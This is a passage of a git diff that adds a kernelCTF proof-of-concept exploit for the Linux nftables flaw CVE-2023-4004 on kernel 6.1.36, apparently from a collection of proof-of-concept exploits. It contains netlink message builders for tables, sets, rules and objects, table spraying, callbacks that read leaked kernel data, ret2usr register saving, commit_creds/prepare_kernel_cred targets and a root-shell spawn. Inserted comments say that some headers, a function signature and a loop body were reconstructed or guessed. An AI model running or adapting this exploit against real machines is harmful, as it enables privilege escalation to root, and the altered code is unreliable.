NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create chain %s\n",chain_name); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit new file mode 100755 index 00000000..ef86eb7a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit.c new file mode 100644 index 00000000..6c1bffe4 --- /dev/null +++ 
b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit.c
@@ -0,0 +1,361 @@
+#define _GNU_SOURCE
+/* header names were garbled in this copy of the diff; reconstructed from what the code uses */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <sched.h>
+#include <arpa/inet.h>
+#include <netlink/netlink.h>
+#include <netlink/socket.h>
+#include <netlink/msg.h>
+#include <netlink/attr.h>
+#include <netlink/netfilter/nfnl.h>
+#include <linux/netlink.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+
+#include "obj.h"
+#include "setelem.h"
+#include "table.h"
+#include "set.h"
+#include "rule.h"
+#include "chain.h"
+#include "spec.h"
+#define THREAD_MAX_NUM 100
+#define SET_TABLE "set-table"
+#define OBJ_FOR_REF "obj-for-ref"
+#define OBJ_TABLE "obj-table"
+
+char *leak_obj=NULL;
+char *target_table=NULL;
+char *leak_data=NULL;
+int ct_expect_obj_num = 0;
+int table_num = 0;
+
+unsigned long user_cs,user_ss,user_rsp,user_rflags;
+uint64_t kernel_off, module_base, type_addr, prepare_kernel_cred, commit_creds;
+uint64_t set_num = 0;
+static void save_state() {
+    asm(
+    "movq %%cs, %0\n"
+    "movq %%ss, %1\n"
+    "movq %%rsp, %2\n"
+    "pushfq\n"
+    "popq %3\n"
+    : "=r" (user_cs), "=r" (user_ss), "=r" (user_rsp),"=r" (user_rflags) : : "memory");
+}
+
+
+void shell(){
+    printf("ret2usr success! uid : %d\n",getuid());
+    //char *args[] = {"/bin/sh", "-c", "nsenter --target 1 -m -p;/bin/bash",NULL};
+    char *args[] = {"/bin/sh", "-i", NULL};
+    execve(args[0], args, NULL);
+}
+
+int nl_callback_find_target_table(struct nl_msg* recv_msg, void* arg)
+{
+
+    struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
+    struct nlattr * tb_msg[NFTA_TABLE_MAX+1];
+    memset(tb_msg,0,sizeof(tb_msg));
+
+    if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
+        //fprintf(stderr, "Received NLMSG_ERROR message!\n");
+        return NL_STOP;
+    }
+
+    struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg));
+    int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg));
+    nla_parse(tb_msg, NFTA_TABLE_MAX, attr, attrlen, NULL);
+    char * table_name=NULL;
+    if (tb_msg[NFTA_TABLE_NAME]) {
+        table_name = nla_get_string(tb_msg[NFTA_TABLE_NAME]);
+        //printf("Get table: '%s'\n", table_name );
+    }
+    if (tb_msg[NFTA_TABLE_USERDATA]){
+        uint64_t * val = malloc(nla_len(tb_msg[NFTA_TABLE_USERDATA]));
+        nla_memcpy(val, tb_msg[NFTA_TABLE_USERDATA], nla_len(tb_msg[NFTA_TABLE_USERDATA]));
+        //printf("data[0] = %lx\n", val[0]);
+        if((val[0]&0xfffffffffffff000)!= 0x4c00000000000000 && val[0] != 0){
+            printf("Get table: '%s'\n", table_name );
+            printf("data[0] = %lx\n", val[0]);
+            leak_obj = (char *)val;
+            target_table = malloc(strlen(table_name)+1);
+            strcpy(target_table,table_name);
+            leak_data = (char *)val;
+        }
+    }
+    return NL_OK;
+}
+
+
+int nl_callback_for_obj(struct nl_msg* recv_msg, void* arg)
+{
+
+    struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
+    struct nlattr * tb_msg[NFTA_OBJ_MAX+1];
+    memset(tb_msg,0,sizeof(tb_msg));
+
+    if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
+        //fprintf(stderr, "Received NLMSG_ERROR message!\n");
+        return NL_STOP;
+    }
+
+    struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg));
+    int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg));
+    nla_parse(tb_msg, NFTA_OBJ_MAX, attr, attrlen, NULL);
+    char * obj_name=NULL;
+    if (tb_msg[NFTA_OBJ_NAME]) {
+        obj_name = nla_get_string(tb_msg[NFTA_OBJ_NAME]);
+        printf("Get obj: '%s'\n", obj_name );
+    }
+    if (tb_msg[NFTA_OBJ_USERDATA]){
+        uint64_t * val = malloc(nla_len(tb_msg[NFTA_OBJ_USERDATA]));
+        nla_memcpy(val, tb_msg[NFTA_OBJ_USERDATA], nla_len(tb_msg[NFTA_OBJ_USERDATA]));
+        printf("data[0] = %lx\n", val[0]);
+        leak_data = (char *)val;
+    }
+    return NL_OK;
+}
+
+int setup_sandbox(void) {
+    if (unshare(CLONE_NEWUSER) < 0) {
+        perror("[-] unshare(CLONE_NEWUSER)");
+        return -1;
+    }
+    if (unshare(CLONE_NEWNET) < 0) {
+        perror("[-] unshare(CLONE_NEWNET)");
+        return -1;
+    }
+    return 0;
+}
+
+void spray_tables(struct nl_sock * socket, int len, char *udata, int size){
+    char *tmp = malloc(0x100);
+    memset(tmp,0,0x100);
+    int i;
+    for(i=0;i<len;i++){
+        sprintf(tmp,"table%d",table_num++); /* loop body reconstructed; the name pattern is assumed */
+        new_table_with_udata(socket,tmp,udata,size);
+    }
+}
+
+/* signature and preamble reconstructed; they follow the same batch pattern as new_obj_tunnel()/new_obj_quota() below */
+void new_obj_ct_expect(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){
+    struct nl_msg * msg = nlmsg_alloc();
+    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
+    struct nlmsghdr *hdr1 = nlmsg_put(
+        msg,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        NFNL_MSG_BATCH_BEGIN, // TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+    h->nfgen_family = 2;
+    h->version = 0;
+    h->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+    struct nl_msg * msg2 = nlmsg_alloc();
+    struct nlmsghdr *hdr2 = nlmsg_put(
+        msg2,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+    );
+    struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+    h2->nfgen_family = 2;//NFPROTO_IPV4;
+    h2->version = 0;
+    h2->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+    struct nl_msg * msg3 = nlmsg_alloc();
+    struct nlmsghdr *hdr3 = nlmsg_put(
+        msg3,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        NFNL_MSG_BATCH_END,// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    //init msg
+    //create test1
+    struct nl_msg *data = nlmsg_alloc();
+    char *a = malloc(0x100);
+    memset(a,0x41,0x100);
+
+    nla_put_u8(data, NFTA_CT_EXPECT_L4PROTO, 0x41);
+    nla_put_u16(data, NFTA_CT_EXPECT_DPORT, 0x4141);
+    nla_put_u32(data, NFTA_CT_EXPECT_TIMEOUT, 0x41414141);
+    nla_put_u8(data, NFTA_CT_EXPECT_SIZE, 0x41);
+    nla_put_nested(msg2, NFTA_OBJ_DATA, data);
+    nla_put_string(msg2, NFTA_OBJ_NAME, obj_name);
+    nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_CT_EXPECT));
+    nla_put_string(msg2, NFTA_OBJ_TABLE, table_name);
+    if(udata>0)
+        nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata);
+    //int res = nl_send_auto(socket, msg);
+    uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
+    char *buf = malloc(total_size);
+    memset(buf,0,total_size);
+    memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
+    int res = nl_sendto(socket, buf, total_size);
+    nlmsg_free(msg);
+    if (res < 0) {
+        fprintf(stderr, "sending message failed\n");
+    } else {
+        //printf("Create object tunnel %s\n",obj_name);
+    }
+}
+void new_obj_tunnel(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){
+    struct nl_msg * msg = nlmsg_alloc();
+    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
+    struct nlmsghdr *hdr1 = nlmsg_put(
+        msg,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        NFNL_MSG_BATCH_BEGIN, // TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+    h->nfgen_family = 2;
+    h->version = 0;
+    h->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+    struct nl_msg * msg2 = nlmsg_alloc();
+    struct nlmsghdr *hdr2 = nlmsg_put(
+        msg2,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin with seq number 0
+        (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+    );
+    struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+    h2->nfgen_family = 2;//NFPROTO_IPV4;
h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *ip = nlmsg_alloc(); + struct nl_msg *opts = nlmsg_alloc(); + struct nl_msg *opts_gen = nlmsg_alloc(); + //init ip + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_u32(ip, NFTA_TUNNEL_KEY_IP_DST, 0x41414141); + + nla_put_u16(opts_gen, NFTA_TUNNEL_KEY_GENEVE_CLASS, 0x10); + nla_put(opts_gen, NFTA_TUNNEL_KEY_GENEVE_DATA, 0x80, a); + nla_put_u8(opts_gen, NFTA_TUNNEL_KEY_GENEVE_TYPE, 0x10); + + nla_put_nested(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE|NLA_F_NESTED, opts_gen); + //struct nlattr *nla = nla_reserve(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE, nlmsg_datalen(opts_gen->nm_nlh)); + //nla->nla_type |= NLA_F_NESTED; + //memcpy(nla_data(nla), nlmsg_data(opts_gen->nm_nlh),nlmsg_datalen(opts_gen->nm_nlh)); + + nla_put_u32(data, NFTA_TUNNEL_KEY_ID, 0x41414141); + nla_put_nested(data, NFTA_TUNNEL_KEY_IP, ip); + nla_put_nested(data, NFTA_TUNNEL_KEY_OPTS, opts); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_TUNNEL)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} + +void new_obj_quota(struct nl_sock * socket, char *table_name, char *obj_name,void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + 
NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + //init ip + nla_put_u64(data, NFTA_QUOTA_BYTES, 0x100); + + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_QUOTA)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object quota %s\n",obj_name); + } +} + +void get_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETOBJ, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_u32(msg, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg, NFTA_OBJ_NAME, obj_name); + nla_put_string(msg, NFTA_OBJ_TABLE, table_name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get obj %s\n",obj_name); + } +} + +void del_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + 
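+    // assemble the batch into one contiguous buffer, [BATCH_BEGIN][DELOBJ][BATCH_END] with each message NLMSG_ALIGNed, and send it with a single nl_sendto()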
memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/rule.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/rule.h new file mode 100644 index 00000000..d1fcd292 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/rule.h @@ -0,0 +1,71 @@ +void new_rule(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWRULE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nl_msg * exprs = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *expr_data = nlmsg_alloc(); + + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_string(expr_data, NFTA_MATCH_NAME, "set"); + nla_put_u32(expr_data, NFTA_MATCH_REV, htonl(0)); + nla_put(expr_data, NFTA_MATCH_INFO,0x100,a); + + nla_put_string(data_nest, NFTA_EXPR_NAME, "match"); + nla_put_nested(data_nest, NFTA_EXPR_DATA, expr_data); + + nla_put_nested(exprs, NFTA_LIST_ELEM, data_nest); + nla_put_string(msg2, NFTA_RULE_TABLE, table_name); + nla_put_string(msg2, NFTA_RULE_CHAIN, chain_name); + nla_put_nested(msg2, NFTA_RULE_EXPRESSIONS, exprs); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create rule\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/set.h 
b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/set.h new file mode 100644 index 00000000..d053bed8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/set.h @@ -0,0 +1,77 @@ +void new_set(struct nl_sock * socket, char *table_name, char *set_name, uint32_t obj_type){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSET),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *data_nest_nest = nlmsg_alloc(); + //init IPSET_ATTR_DATA + + int i=0; + + nla_put_u32(data_nest_nest, NFTA_SET_FIELD_LEN, htonl(0x10)); + for(i=0;i<2;i++){ + nla_put_nested(data_nest, NFTA_LIST_ELEM, data_nest_nest); + } + + nla_put_nested(data, NFTA_SET_DESC_CONCAT, data_nest); + //create test1 + nla_put_string(msg2, NFTA_SET_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_NAME, set_name); + nla_put_u32(msg2, NFTA_SET_ID, 0x10); + nla_put_nested(msg2, NFTA_SET_DESC, data); + nla_put_u32(msg2, NFTA_SET_KEY_LEN, htonl(0x40)); + nla_put_u32(msg2, NFTA_SET_FLAGS, htonl(NFT_SET_INTERVAL|NFT_SET_OBJECT|NFT_SET_CONCAT)); + nla_put_u32(msg2, NFTA_SET_OBJ_TYPE, htonl(obj_type)); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/setelem.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/setelem.h new file mode 100644 index 00000000..6e8a2a28 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/setelem.h @@ -0,0 +1,212 @@ +#define OBJ_FOR_REF "obj-for-ref" +#define ELEM_KEY_END "test-elem-key-end" +void new_setelem(struct nl_sock * socket,char *table_name, char *set_name, void *udata, 
